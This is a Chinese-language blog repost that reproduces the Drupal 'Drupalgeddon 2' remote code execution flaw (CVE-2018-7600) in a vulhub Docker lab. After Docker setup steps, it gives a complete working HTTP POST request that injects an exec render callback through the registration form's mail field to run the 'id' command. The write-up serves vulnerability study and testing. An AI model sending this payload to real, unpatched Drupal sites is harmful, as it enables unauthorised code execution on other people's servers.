首页 > 其他 > 详细

CVE-2018-7600 Drupal Drupalgeddon 2 远程代码执行漏洞复现

时间:2021-04-11 22:01:11      阅读:40      评论:0      收藏:0      [点我收藏+]

CVE-2018-7600 Drupal Drupalgeddon 2 远程代码执行漏洞

0x01.环境搭建

利用vulhub搭建漏洞环境

service docker start
docker-compose up -d

技术分享图片

查看监听端口

docker-compose ps

技术分享图片

访问http://target_p:8080/将会看到drupal的安装页面,一路默认配置下一步安装。因为没有mysql环境,所以安装的时候可以选择sqlite数据库

技术分享图片

0x02.漏洞介绍

Drupal 是一款用量庞大的CMS,其6/7/8版本的Form API中存在一处远程代码执行漏洞

0x03.漏洞复现

我们向安装完成的drupal发送如下数据包

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 103

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id

成功执行代码,这个代码最终执行了id命令

技术分享图片

CVE-2018-7600 Drupal Drupalgeddon 2 远程代码执行漏洞复现

原文:https://www.cnblogs.com/-Anguvia-/p/14645144.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!